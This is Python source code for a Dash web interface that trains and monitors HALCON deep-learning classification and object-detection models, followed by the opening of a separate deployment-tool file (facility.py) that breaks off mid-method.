############################################## Call Backs ##################################################
############################################################################################################
############################################ Classification ##################################
@app.callback(
Output('AugmentationPercentage_CL', 'children'),
Input('AugmentationPercentage_CL_slider', 'value'),
)
def update_output(value):
return 'Augmentation Percentage: {}%'.format(value)
@app.callback(
Output("Rotation_CL", "disabled"),
Output("Rotation_CL", "placeholder"),
Output("RotationRange_CL", "disabled"),
Output("RotationRange_CL", "placeholder"),
Input("Rotation_CL_Switch", "value"),
State("Rotation_CL", "disabled"),
State("Rotation_CL", "placeholder"),
State("RotationRange_CL", "disabled"),
State("RotationRange_CL", "placeholder")
)
def Rotation_CL_switch(Rotation_CL_Switch, Rotation_CL_disabled, Rotation_CL_placeholder, RotationRange_CL_disabled,
RotationRange_CL_placeholder):
if not Rotation_CL_Switch:
Rotation_CL_disabled = True
RotationRange_CL_disabled = True
Rotation_CL_placeholder = 'Disabled'
RotationRange_CL_placeholder = 'Disabled'
elif Rotation_CL_Switch == [0]:
Rotation_CL_disabled = False
RotationRange_CL_disabled = False
Rotation_CL_placeholder = ''
RotationRange_CL_placeholder = ''
return Rotation_CL_disabled, Rotation_CL_placeholder, RotationRange_CL_disabled, RotationRange_CL_placeholder
@app.callback(
Output("mirror_CL", "disabled"),
Output("mirror_CL", "placeholder"),
Input("mirror_CL_Switch", "value"),
State("mirror_CL", "disabled"),
State("mirror_CL", "placeholder")
)
def mirror_CL_switch(mirror_CL_Switch, disabled, placeholder):
if not mirror_CL_Switch:
disabled = True
placeholder = 'Disabled'
elif mirror_CL_Switch == [0]:
disabled = False
placeholder = ''
return disabled, placeholder
@app.callback(
Output("BrightnessVariation_CL", "disabled"),
Output("BrightnessVariation_CL", "placeholder"),
Output("BrightnessVariationSpot_CL", "disabled"),
Output("BrightnessVariationSpot_CL", "placeholder"),
Input("BrightnessVariation_CL_Switch", "value"),
State("BrightnessVariation_CL", "disabled"),
State("BrightnessVariation_CL", "placeholder"),
State("BrightnessVariationSpot_CL", "disabled"),
State("BrightnessVariationSpot_CL", "placeholder")
)
def Brightness_Variation_CL_switch(BrightnessVariation_CL_Switch, BrightnessVariation_CL_disabled,
BrightnessVariation_CL_placeholder, BrightnessVariationSpot_CL_disabled,
BrightnessVariationSpot_CL_placeholder):
if not BrightnessVariation_CL_Switch:
BrightnessVariation_CL_disabled = True
BrightnessVariationSpot_CL_disabled = True
BrightnessVariation_CL_placeholder = 'Disabled'
BrightnessVariationSpot_CL_placeholder = 'Disabled'
elif BrightnessVariation_CL_Switch == [0]:
BrightnessVariation_CL_disabled = False
BrightnessVariationSpot_CL_disabled = False
BrightnessVariation_CL_placeholder = ''
BrightnessVariationSpot_CL_placeholder = ''
return BrightnessVariation_CL_disabled, BrightnessVariation_CL_placeholder, BrightnessVariationSpot_CL_disabled, BrightnessVariationSpot_CL_placeholder
@app.callback(
Output("CropPercentage_CL", "disabled"),
Output("CropPercentage_CL", "placeholder"),
Output("CropPixel_CL", "disabled"),
Output("CropPixel_CL", "placeholder"),
Input("Crop_CL_Switch", "value"),
State("CropPercentage_CL", "disabled"),
State("CropPercentage_CL", "placeholder"),
State("CropPixel_CL", "disabled"),
State("CropPixel_CL", "placeholder")
)
def Crop_CL_switch(Crop_CL_Switch, CropPercentage_CL_disabled, CropPercentage_CL_placeholder, CropPixel_CL_disabled,
CropPixel_CL_placeholder):
if not Crop_CL_Switch:
CropPercentage_CL_disabled = True
CropPixel_CL_disabled = True
CropPercentage_CL_placeholder = 'Disabled'
CropPixel_CL_placeholder = 'Disabled'
elif Crop_CL_Switch == [0]:
CropPercentage_CL_disabled = False
CropPixel_CL_disabled = False
CropPercentage_CL_placeholder = ''
CropPixel_CL_placeholder = ''
return CropPercentage_CL_disabled, CropPercentage_CL_placeholder, CropPixel_CL_disabled, CropPixel_CL_placeholder
@app.callback(
Output("ClassIDsNoOrientation", "disabled"),
Output("ClassIDsNoOrientation", "placeholder"),
Input("ClassID_CL_Switch", "value"),
State("ClassIDsNoOrientation", "disabled"),
State("ClassIDsNoOrientation", "placeholder")
)
def ClassIDs_CL_switch(ClassID_CL_Switch, disabled, placeholder):
if not ClassID_CL_Switch:
disabled = True
placeholder = 'Disabled'
elif ClassID_CL_Switch == [0]:
disabled = False
placeholder = ''
return disabled, placeholder
@app.callback(Output('Operation_output_CL', 'children'),
Output("Training_loading_CL", "children"),
Input('operation_button_CL', 'n_clicks'),
State('Rotation_CL_Switch', 'value'),
State('mirror_CL_Switch', 'value'),
State('BrightnessVariation_CL_Switch', 'value'),
State('Crop_CL_Switch', 'value'),
State('Direction_CL_Switch', 'value'),
State('ProjectName_CL', 'value'),
State('Runtime_CL', 'value'),
State('PretrainedModel_CL', 'value'),
State('ImWidth_CL', 'value'),
State('ImHeight_CL', 'value'),
State('ImChannel_CL', 'value'),
State('BatchSize_CL', 'value'),
State('InitialLearningRate_CL', 'value'),
State('Momentum_CL', 'value'),
State('NumEpochs_CL', 'value'),
State('ChangeLearningRateEpochs_CL', 'value'),
State('lr_change_CL', 'value'),
State('WeightPrior_CL', 'value'),
State('class_penalty_CL', 'value'), # AugmentationPercentage_CL_slider
State('AugmentationPercentage_CL_slider', 'value'),
State('Rotation_CL', 'value'),
State('mirror_CL', 'value'),
State('BrightnessVariation_CL', 'value'),
State('BrightnessVariationSpot_CL', 'value'),
State('RotationRange_CL', 'value'),
State('CropPercentage_CL', 'value'),
State('CropPixel_CL', 'value'),
)
def operation_CL(operation_button_CL, Rotation_CL_Switch, mirror_CL_Switch, BrightnessVariation_CL_Switch,
Crop_CL_Switch, Direction_CL_Switch, ProjectName_CL, Runtime_CL, PretrainedModel_CL, ImWidth_CL,
ImHeight_CL, ImChannel_CL, BatchSize_CL, InitialLearningRate_CL, Momentum_CL, NumEpochs_CL,
ChangeLearningRateEpochs_CL, lr_change_CL, WeightPrior_CL,
class_penalty_CL, AugmentationPercentage_CL, Rotation_CL, mirror_CL, BrightnessVariation_CL,
BrightnessVariationSpot_CL, RotationRange_CL, CropPercentage_CL, CropPixel_CL):
ctx_operation_CL = dash.callback_context
if not ctx_operation_CL.triggered:
button_id = 'Null'
else:
button_id = ctx_operation_CL.triggered[0]['prop_id'].split('.')[0]
print(button_id)
if button_id == 'Null':
raise PreventUpdate
else:
if button_id == 'operation_button_CL':
var = list((x for x in list(map(str.upper, run.CLProjectList)) if ProjectName_CL.upper() in x))
ProjectDir_CL = run.Chadle_DataDir + '/Classification/' + var[0]
ParameterDict = {'ProjectName': ProjectName_CL,
'Runtime': Runtime_CL, 'PretrainedModel': PretrainedModel_CL, 'ImWidth': ImWidth_CL,
'ImHeight': ImHeight_CL,
'ImChannel': ImChannel_CL,
'BatchSize': BatchSize_CL, 'InitialLearningRate': InitialLearningRate_CL,
'Momentum': Momentum_CL,
'NumEpochs': NumEpochs_CL,
'ChangeLearningRateEpochs': ChangeLearningRateEpochs_CL, 'lr_change': lr_change_CL,
'WeightPrior': WeightPrior_CL,
'class_penalty': class_penalty_CL, 'AugmentationPercentage': AugmentationPercentage_CL,
'Rotation': Rotation_CL, 'mirror': mirror_CL,
'BrightnessVariation': BrightnessVariation_CL,
'BrightnessVariationSpot': BrightnessVariationSpot_CL,
'RotationRange': RotationRange_CL, }
if os.path.exists(ProjectDir_CL + '/status.txt'):
os.remove(ProjectDir_CL + '/status.txt')
with open(ProjectDir_CL + '/hyper_parameters.txt', 'w') as outfile:
json.dump(ParameterDict, outfile)
pre_process_param = run.pre_process_CL(Rotation_CL_Switch, mirror_CL_Switch,
BrightnessVariation_CL_Switch,
Crop_CL_Switch, Direction_CL_Switch, ProjectName_CL, Runtime_CL,
PretrainedModel_CL,
ImWidth_CL,
ImHeight_CL,
ImChannel_CL,
BatchSize_CL, InitialLearningRate_CL, Momentum_CL, NumEpochs_CL,
ChangeLearningRateEpochs_CL, lr_change_CL, WeightPrior_CL,
class_penalty_CL, AugmentationPercentage_CL, Rotation_CL, mirror_CL,
BrightnessVariation_CL, BrightnessVariationSpot_CL,
RotationRange_CL, CropPercentage_CL, CropPixel_CL)
DLModelHandle = pre_process_param[0][0]
DLDataset = pre_process_param[1][0]
TrainParam = pre_process_param[2][0]
run.training_CL(DLModelHandle, DLDataset, TrainParam)
metricList.append(DLModelHandle)
metricList.append(DLDataset)
metricList.append(TrainParam)
# run.training(templist[-3], templist[-2], templist[-1])
# run.training(templist[0], templist[1], templist[2])
else:
i = 1
# run.training(templist[-3], templist[-2], templist[-1])
return '', ''
@app.callback(Output('evaluation_graph_CL', 'figure'),
Output('Evaluation_loading_CL', 'children'),
Input('evaluation_button_CL', 'n_clicks'),
State('ProjectName_CL', 'value'),
State('ImWidth_CL', 'value'),
State('ImHeight_CL', 'value'),
# State('RotationRange', 'value'),
# State('IgnoreDirection', 'value'),
)
def evaluation_CL(evaluation_button_CL, ProjectName_CL, ImWidth_CL, ImHeight_CL):
z = [[0, 0], [0, 0]]
x = ['Confusion Matrix', 'Confusion Matrix']
y = ['Confusion Matrix', 'Confusion Matrix']
# change each element of z to type string for annotations
z_text = [[str(y) for y in x] for x in z]
fig = ff.create_annotated_heatmap([[0, 0], [0, 0]], x=x, y=y, annotation_text=z_text, colorscale='Blues')
ctx_evaluation_CL = dash.callback_context
if not ctx_evaluation_CL.triggered:
button_id = 'Null'
else:
button_id = ctx_evaluation_CL.triggered[0]['prop_id'].split('.')[0]
if button_id == 'evaluation_button_CL':
print('Evaluation Started')
evaluationList = run.evaluation_CL(ProjectName_CL, ImWidth_CL, ImHeight_CL)
z.clear()
x.clear()
y.clear()
z_text.clear()
confusion_matrix_List = evaluationList[0]
mean_precision = evaluationList[1][0]
mean_recall = evaluationList[2][0]
mean_f_score = evaluationList[3][0]
mean_precision = format(mean_precision, '.3f')
mean_recall = format(mean_recall, '.3f')
mean_f_score = format(mean_f_score, '.3f')
categories = run.getImageCategories(ProjectName_CL, 'Classification')[0]
labels = run.getImageCategories(ProjectName_CL, 'Classification')[1]
# threading.Thread(target=evaluation).start()
length = len(categories)
sublist = [confusion_matrix_List[i:i + length] for i in range(0, len(confusion_matrix_List), length)]
for i in sublist:
z.append(i)
for i in categories:
x.append(i)
y.append(i)
# change each element of z to type string for annotations
# z_text = [[str(y) for y in x] for x in z]
# set up figure
z_text = [[str(y) for y in x] for x in z]
fig = ff.create_annotated_heatmap(z, x=x, y=y, annotation_text=z_text, colorscale='Blues')
# change each element of z to type string for annotations
# add title
fig.update_layout(
            title_text='Mean Precision: ' + str(mean_precision) + '<br>Mean Recall: ' + str(
                mean_recall) + '<br>Mean F Score: ' + str(mean_f_score),
)
# add custom xaxis title
fig.add_annotation(dict(font=dict(color="black", size=14),
x=0.5,
y=-0.15,
showarrow=False,
text="Ground Truth",
xref="paper",
yref="paper"))
# add custom yaxis title
fig.add_annotation(dict(font=dict(color="black", size=14),
x=-0.1,
y=0.5,
showarrow=False,
text="Prediction",
textangle=-90,
xref="paper",
yref="paper"))
# adjust margins to make room for yaxis title
fig.update_layout(margin=dict(t=50, l=200))
# add colorbar
fig['data'][0]['showscale'] = True
return fig, ' '
# Historical method to produce json file of input parameters
@app.callback(Output('makeJson_CL', 'children'),
# Input('parameters_out_button', 'n_clicks'),
Input('ProjectName_CL', 'value'),
State('Runtime_CL', 'value'),
State('PretrainedModel_CL', 'value'),
State('ImWidth_CL', 'value'),
State('ImHeight_CL', 'value'),
State('ImChannel_CL', 'value'),
State('BatchSize_CL', 'value'),
State('InitialLearningRate_CL', 'value'),
State('Momentum_CL', 'value'),
State('NumEpochs_CL', 'value'),
State('ChangeLearningRateEpochs_CL', 'value'),
State('lr_change_CL', 'value'),
State('WeightPrior_CL', 'value'),
State('class_penalty_CL', 'value'),
State('AugmentationPercentage_CL_slider', 'value'),
State('Rotation_CL', 'value'),
State('mirror_CL', 'value'),
State('BrightnessVariation_CL', 'value'),
State('BrightnessVariationSpot_CL', 'value'),
State('RotationRange_CL', 'value'),
# State('IgnoreDirection', 'value'),
# State('ClassIDsNoOrientationExist', 'value'),
# State('ClassIDsNoOrientation', 'value'),
)
def makeJson_CL(ProjectName_CL, Runtime_CL, PretrainedModel_CL, ImWidth_CL, ImHeight_CL, ImChannel_CL,
BatchSize_CL, InitialLearningRate_CL, Momentum_CL, NumEpochs_CL,
ChangeLearningRateEpochs_CL, lr_change_CL, WeightPrior_CL,
class_penalty_CL, AugmentationPercentage_CL, Rotation_CL, mirror_CL,
BrightnessVariation_CL, BrightnessVariationSpot_CL,
RotationRange_CL):
ParameterDict = {'ProjectName': ProjectName_CL,
'Runtime': Runtime_CL, 'PretrainedModel': PretrainedModel_CL, 'ImWidth': ImWidth_CL,
'ImHeight': ImHeight_CL,
'ImChannel': ImChannel_CL,
'BatchSize': BatchSize_CL, 'InitialLearningRate': InitialLearningRate_CL, 'Momentum': Momentum_CL,
'NumEpochs': NumEpochs_CL,
'ChangeLearningRateEpochs': ChangeLearningRateEpochs_CL, 'lr_change': lr_change_CL,
'WeightPrior': WeightPrior_CL,
'class_penalty': class_penalty_CL, 'AugmentationPercentage': AugmentationPercentage_CL,
'Rotation': Rotation_CL, 'mirror': mirror_CL,
'BrightnessVariation': BrightnessVariation_CL,
'BrightnessVariationSpot': BrightnessVariationSpot_CL,
'RotationRange': RotationRange_CL, }
ctx = dash.callback_context
if not ctx.triggered:
button_id = 'Null'
else:
button_id = ctx.triggered[0]['prop_id'].split('.')[0]
if button_id == 'parameters_out_button':
with open('parameters_json.txt', 'w') as outfile:
json.dump(ParameterDict, outfile)
return 'To json done!'
@app.callback(Output('metrics_CL', 'children'),
Input('interval_graph_CL', 'n_intervals'))
def update_metrics_CL(n):
# Indication Text configuration
# Extract data from Hdict and show as texts.
style = {'padding': '5px', 'fontSize': '16px'}
get_metrics = run.get_TrainInfo_CL()
if get_metrics:
time_elapsed = get_metrics[0]
time_remaining = get_metrics[1]
epoch_metrics = get_metrics[2]
else:
time_elapsed = 0
time_remaining = 0
epoch_metrics = 0
return [
html.Span('Time Elapsed: {}'.format(str(datetime.timedelta(seconds=int(time_elapsed)))), style=style),
html.Span('Time Remaining: {}'.format(time_remaining), style=style),
html.Span('Current Epoch: {}'.format(epoch_metrics), style=style)
]
# Multiple components can update every time the interval fires.
@app.callback(Output('iteration_loss_graph_CL', 'figure'),
Input('interval_graph_CL', 'n_intervals'))
def iteration_loss_graph_CL(n):
# Loss Graph configuration
# Using plotly subplots. May consider changing to others.
iteration_loss_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1)
iteration_loss_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 50, 't': 80, 'autoexpand': False,
}
iteration_loss_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left', 'title': 'Loss-Iteration Graph'}
iteration_loss_graph_fig.update_layout(legend_title_text='Loss-Iteration Graph')
iteration_loss_graph_fig.update_xaxes(title_text="Iteration", row=1, col=1)
iteration_loss_graph_fig.update_yaxes(title_text="Loss", row=1, col=1)
# If the Hdict files do not exist, clear the graph and the lists used for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getTrainInfo = run.get_TrainInfo_CL()
if not getTrainInfo:
iterationList.clear()
epochOfLossList.clear()
lossList.clear()
else:
epoch_TrainInfo = getTrainInfo[2]
loss = getTrainInfo[3]
iteration = getTrainInfo[4]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However, feedback from Halcon may take up to 5 secs.
# Using <in> with list, average time complexity: O(n)
# if iteration not in iterationList:
epochOfLossList.append(epoch_TrainInfo)
lossList.append(loss)
iterationList.append(iteration)
# Add the values to graph and start plotting.
iteration_loss_graph_fig.append_trace({
'x': epochOfLossList,
'y': lossList,
'text': iterationList,
'name': 'iteration vs loss',
'mode': 'lines',
'type': 'scatter'
}, 1, 1)
return iteration_loss_graph_fig
@app.callback(Output('top1_error_graph_CL', 'figure'),
Input('interval_graph_CL', 'n_intervals'))
def top1_error_graph_CL(n):
# Top1 Error Graph configuration.
# Using plotly subplots. May consider changing to others.
top1_error_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1, )
top1_error_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 100, 't': 80, 'autoexpand': False,
}
top1_error_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left'}
top1_error_graph_fig.update_xaxes(title_text="Epoch", row=1, col=1)
top1_error_graph_fig.update_yaxes(title_text="Top1 Error", row=1, col=1)
# If the Hdict files do not exist, clear the graph and the lists used for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getEvaluationInfo = run.get_EvaluationInfo_CL()
if not getEvaluationInfo:
TrainSet_top1_error_valueList.clear()
ValidationSet_top1_error_valueList.clear()
epochOfTop1ErrorList.clear()
else:
epoch_EvaluationInfo = getEvaluationInfo[0]
TrainSet_top1_error_value = getEvaluationInfo[1]
ValidationSet_top1_error_value = getEvaluationInfo[2]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However, feedback from Halcon may take up to 5 secs.
# Using <in> with list, average time complexity: O(n)
if TrainSet_top1_error_value not in TrainSet_top1_error_valueList:
epochOfTop1ErrorList.append(epoch_EvaluationInfo)
TrainSet_top1_error_valueList.append(TrainSet_top1_error_value)
ValidationSet_top1_error_valueList.append(ValidationSet_top1_error_value)
# Add the values to graph and start plotting.
# Two plots on the same graph.
top1_error_graph_fig.append_trace({
'x': epochOfTop1ErrorList,
'y': TrainSet_top1_error_valueList,
'name': 'Train Set Top1_error',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
top1_error_graph_fig.append_trace({
'x': epochOfTop1ErrorList,
'y': ValidationSet_top1_error_valueList,
'name': 'Validation Set Top1_error',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
return top1_error_graph_fig
############################################ Object Detection ################################
@app.callback(Output('MinLevel_OD', 'children'),
Output('MaxLevel_OD', 'children'),
Output('AnchorNumSubscales_OD', 'children'),
Output('AnchorAspectRatios_OD', 'children'),
Output('Estimate_values_loading_OD', 'children'),
Input('estimate_button_OD', 'n_clicks'),
State('ImWidth_OD', 'value'),
State('ImHeight_OD', 'value'),
State('TrainingPercent_OD', 'value'),
State('ValidationPercent_OD', 'value'),
)
def estimate_value_OD(estimate_button_OD, ImWidth_OD, ImHeight_OD, TrainingPercent_OD, ValidationPercent_OD, ):
Label_data_OD = 'C:/Users/930415/Desktop/Chadle_Projects/Chadle_Data/Object_Detection/NTBW_Image Analytics/NTBW_Initial_2.hdict'
ctx_estimate_value_OD = dash.callback_context
if not ctx_estimate_value_OD.triggered:
button_id = 'Null'
else:
button_id = ctx_estimate_value_OD.triggered[0]['prop_id'].split('.')[0]
if button_id == 'estimate_button_OD':
estimate_value = run_OD.estimate_values_OD(ImWidth_OD, ImHeight_OD, TrainingPercent_OD,
ValidationPercent_OD, Label_data_OD)
DLDataset_preprocess = (estimate_value[0])
MinLevel_OD = (estimate_value[1])
MaxLevel_OD = (estimate_value[2])
AnchorNumSubscales_OD = (estimate_value[3])
estimate_value = [round(number, 3) for number in estimate_value[4]]
print(estimate_value)
AnchorAspectRatios_OD_String = ", ".join(str(number) for number in estimate_value)
AnchorAspectRatios_OD = AnchorAspectRatios_OD_String
return MinLevel_OD, MaxLevel_OD, AnchorNumSubscales_OD, AnchorAspectRatios_OD, ' '
else:
return ' ', ' ', ' ', ' ', ' '
@app.callback(Output('training_output_OD', 'children'),
Output('Training_loading_OD', 'children'),
Input('operation_button_OD', 'n_clicks'),
# State('ProjectName_OD', 'value'),
State('ImWidth_OD', 'value'),
State('ImHeight_OD', 'value'),
State('TrainingPercent_OD', 'value'),
State('ValidationPercent_OD', 'value'),
State('MinLevel_Input_OD', 'value'),
State('MaxLevel_Input_OD', 'value'),
State('AnchorNumSubscales_Input_OD', 'value'),
State('AnchorAspectRatios_Input_OD', 'value'),
State('ImChannel_OD', 'value'),
State('PretrainedModel_OD', 'value'),
State('InstanceType_OD', 'value'),
State('NumClasses_OD', 'value'),
State('Capacity_OD', 'value'),
State('AugmentationPercentage_OD', 'value'),
State('Rotation_OD', 'value'),
State('mirror_OD', 'value'),
State('BrightnessVariation_OD', 'value'),
State('BrightnessVariationSpot_OD', 'value'),
State('RotationRange_OD', 'value'),
State('BatchSize_OD', 'value'),
State('InitialLearningRate_OD', 'value'),
State('Momentum_OD', 'value'),
State('NumEpochs_OD', 'value'),
State('ChangeLearningRateEpochs_OD', 'value'),
State('lr_change_OD', 'value'),
State('WeightPrior_OD', 'value'),
State('class_penalty_OD', 'value'),
)
def operation_OD(operation_button_OD, ImWidth_OD, ImHeight_OD, TrainingPercent_OD, ValidationPercent_OD,
MinLevel_Input_OD, MaxLevel_Input_OD, AnchorNumSubscales_Input_OD, AnchorAspectRatios_Input_OD,
ImChannel_OD, PretrainedModel_OD, InstanceType_OD, NumClasses_OD, Capacity_OD,
AugmentationPercentage_OD, Rotation_OD, mirror_OD, BrightnessVariation_OD, BrightnessVariationSpot_OD,
RotationRange_OD, BatchSize_OD, InitialLearningRate_OD, Momentum_OD, NumEpochs_OD,
ChangeLearningRateEpochs_OD,
lr_change_OD, WeightPrior_OD, class_penalty_OD):
Label_data_OD = 'C:/Users/930415/Desktop/Chadle_Projects/Chadle_Data/Object_Detection/NTBW_Image Analytics/NTBW_Initial_2.hdict'
ctx_operation_OD = dash.callback_context
if not ctx_operation_OD.triggered:
button_id = 'Null'
else:
button_id = ctx_operation_OD.triggered[0]['prop_id'].split('.')[0]
if button_id == 'operation_button_OD':
estimate_value = run_OD.estimate_values_OD(ImWidth_OD, ImHeight_OD, TrainingPercent_OD,
ValidationPercent_OD, Label_data_OD)
DLDataset_preprocess = (estimate_value[0])
# If input empty, use Halcon estimate value.
if MinLevel_Input_OD:
MinLevel_OD = MinLevel_Input_OD
else:
MinLevel_OD = (estimate_value[1])
if MaxLevel_Input_OD:
MaxLevel_OD = MaxLevel_Input_OD
else:
MaxLevel_OD = (estimate_value[2])
if AnchorNumSubscales_Input_OD:
AnchorNumSubscales_OD = AnchorNumSubscales_Input_OD
else:
AnchorNumSubscales_OD = (estimate_value[3])
if AnchorAspectRatios_Input_OD:
AnchorAspectRatios_OD = AnchorAspectRatios_Input_OD.split(',')
else:
AnchorAspectRatios_OD = (estimate_value[4])
print(ImChannel_OD)
preprocess_OD = run_OD.preprocess_OD(ImWidth_OD, ImHeight_OD, ImChannel_OD, TrainingPercent_OD,
ValidationPercent_OD, Label_data_OD,
PretrainedModel_OD,
InstanceType_OD, DLDataset_preprocess,
MinLevel_OD, MaxLevel_OD,
AnchorNumSubscales_OD, AnchorAspectRatios_OD, NumClasses_OD, Capacity_OD)
DLDatasetFileName = preprocess_OD[0]
DLPreprocessParamFileName = preprocess_OD[1]
ModelFileName = preprocess_OD[2]
prepare_for_training_OD = run_OD.prepare_for_training_OD(AugmentationPercentage_OD, Rotation_OD, mirror_OD,
BrightnessVariation_OD, BrightnessVariationSpot_OD,
RotationRange_OD, BatchSize_OD,
InitialLearningRate_OD, Momentum_OD, NumEpochs_OD,
ChangeLearningRateEpochs_OD,
lr_change_OD, WeightPrior_OD, class_penalty_OD,
DLDatasetFileName, DLPreprocessParamFileName,
ModelFileName)
DLModelHandle = prepare_for_training_OD[0][0]
DLDataset = prepare_for_training_OD[1][0]
TrainParam = prepare_for_training_OD[2][0]
# Training
training_OD = run_OD.training_OD(DLDataset, DLModelHandle, TrainParam)
return ' ', ' '
# OD metrics and graphs
@app.callback(Output('metrics_OD', 'children'),
Input('interval_graph_OD', 'n_intervals'))
def update_metrics_OD(n):
# Indication Text configuration
# Extract data from Hdict and show as texts.
style = {'padding': '5px', 'fontSize': '16px'}
get_metrics = run_OD.get_TrainInfo_OD()
if get_metrics:
time_elapsed = get_metrics[0]
time_remaining = get_metrics[1]
epoch_metrics = get_metrics[2]
else:
time_elapsed = 0
time_remaining = 0
epoch_metrics = 0
return [
html.Span('Time Elapsed: {}'.format(str(datetime.timedelta(seconds=int(time_elapsed)))), style=style),
html.Span('Time Remaining: {}'.format(time_remaining), style=style),
html.Span('Current Epoch: {}'.format(epoch_metrics), style=style)
]
# Multiple components can update every time the interval fires.
@app.callback(Output('iteration_loss_graph_OD', 'figure'),
Input('interval_graph_OD', 'n_intervals'))
def iteration_loss_graph_OD(n):
# Loss Graph configuration
# Using plotly subplots. May consider changing to others.
iteration_loss_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1)
iteration_loss_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 50, 't': 80, 'autoexpand': False,
}
iteration_loss_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left', 'title': 'Loss-Iteration Graph'}
iteration_loss_graph_fig.update_layout(legend_title_text='Loss-Iteration Graph')
iteration_loss_graph_fig.update_xaxes(title_text="Iteration", row=1, col=1)
iteration_loss_graph_fig.update_yaxes(title_text="Loss", row=1, col=1)
# If the Hdict files do not exist, clear the graph and the lists used for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getTrainInfo = run_OD.get_TrainInfo_OD()
if not getTrainInfo:
iterationList.clear()
epochOfLossList.clear()
lossList.clear()
else:
epoch_TrainInfo = getTrainInfo[2]
loss = getTrainInfo[3]
iteration = getTrainInfo[4]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However, feedback from Halcon may take up to 5 secs.
# Using <in> with list, average time complexity: O(n)
if iteration not in iterationList:
epochOfLossList.append(epoch_TrainInfo)
lossList.append(loss)
iterationList.append(iteration)
# Add the values to graph and start plotting.
iteration_loss_graph_fig.append_trace({
'x': epochOfLossList,
'y': lossList,
'text': iterationList,
'name': 'iteration vs loss',
'mode': 'lines',
'type': 'scatter'
}, 1, 1)
return iteration_loss_graph_fig
@app.callback(Output('mean_ap_graph_OD', 'figure'),
Input('interval_graph_OD', 'n_intervals'))
def mean_ap_graph_OD(n):
# Mean AP Graph configuration.
# Using plotly subplots. May consider changing to others.
mean_ap_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1, )
mean_ap_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 100, 't': 80, 'autoexpand': False,
}
mean_ap_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left'}
mean_ap_graph_fig.update_xaxes(title_text="Epoch", row=1, col=1)
mean_ap_graph_fig.update_yaxes(title_text="Top1 Error", row=1, col=1)
# If the Hdict files do not exist, clear the graph and the lists used for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getEvaluationInfo = run_OD.get_EvaluationInfo_OD()
if not getEvaluationInfo:
TrainSet_mean_ap_valueList.clear()
ValidationSet_mean_ap_valueList.clear()
epochOfMeanAPList.clear()
else:
epoch_EvaluationInfo = getEvaluationInfo[0]
TrainSet_mean_ap_value = getEvaluationInfo[1]
ValidationSet_mean_ap_value = getEvaluationInfo[2]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However, feedback from Halcon may take up to 5 secs.
# Using <in> with list, average time complexity: O(n)
# if TrainSet_mean_ap_value not in TrainSet_mean_ap_valueList:
epochOfMeanAPList.append(epoch_EvaluationInfo)
TrainSet_mean_ap_valueList.append(TrainSet_mean_ap_value)
ValidationSet_mean_ap_valueList.append(ValidationSet_mean_ap_value)
# Add the values to graph and start plotting.
# Two plots on the same graph.
mean_ap_graph_fig.append_trace({
'x': epochOfMeanAPList,
'y': TrainSet_mean_ap_valueList,
'name': 'Train Set Mean AP',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
mean_ap_graph_fig.append_trace({
'x': epochOfMeanAPList,
'y': ValidationSet_mean_ap_valueList,
'name': 'Validation Set Mean AP',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
return mean_ap_graph_fig
if __name__ == '__main__':
app.run_server(debug=True)
|
facility.py
|
import copy
import inspect
import logging
import os.path
import threading
import time
from collections import abc
from collections import defaultdict
from speedling import cfgfile
from speedling import conf
from speedling import gitutils
from speedling import inv
from speedling import localsh
from speedling import piputils
from speedling import pkgutils
from speedling import util
LOG = logging.getLogger(__name__)
# name: same as the key (auto populated)
# deploy_source pkg (deb/rpm/..), pypi (pip install ..), container
# deploy_mode: standalone (systemd service), mod_wsgi, uwsgi, container, nginx, ...
# consider multiple httpd as well
# instance_name: httpd@instance_name
# 'compose': 'func_ptr to function executed before tasks but after inventory',
# 'goal': task for this service; it can be shared within the components and may differ based on the action
# actions: update, reconfigure, deploy, wipe, dry_reconfigure, dry_update
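# A rough illustration of the service-dict shape described above (purely
# hypothetical values; field names are taken from the comments, not from a
# formal schema):
#
#   REGISTERED_SERVICES['example-api'] = {
#       'name': 'example-api',              # auto populated from the key
#       'deploy_mode': 'standalone',        # i.e. a systemd service
#       'instance_name': 'httpd@example',   # only for instantiated units
#       'component': <Component instance>,  # filled in by register_component()
#       'goal': some_task_function,
#   }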
REGISTERED_SERVICES = {}
# TODO: the registered services have to provide the options only; we need to have a configured service list
# as well, which includes the selection and is read by the service steps
REGISTERED_COMPONENTS = {}
UNIT_NAME_MAPPING = {}
class Component(object):
default_component_config = {}
deploy_source = 'src'
deploy_mode = 'standalone'
supported_deploy_mode = {'src', 'pkg', 'pip', 'asset'}
services = {}
leaf = True
final_task = None
def extend_consumers(self, dependencies, prefix=tuple()):
# supported shapes: [{sname: section, component: Component}, ..] first is default
# {sname: Component, sname2: Component2 } # unordered
if isinstance(dependencies, abc.Mapping):
for k, v in dependencies.items():
if isinstance(v, Component):
consumed_as = v.consumers.setdefault(self, [])
consumed_as.append(prefix + (k,))
if isinstance(v, abc.Mapping):
self.extend_consumers(v, prefix=prefix + (k,))
if isinstance(v, abc.Iterable):
for d in v:
if isinstance(d, abc.Mapping):
if 'sname' in d:
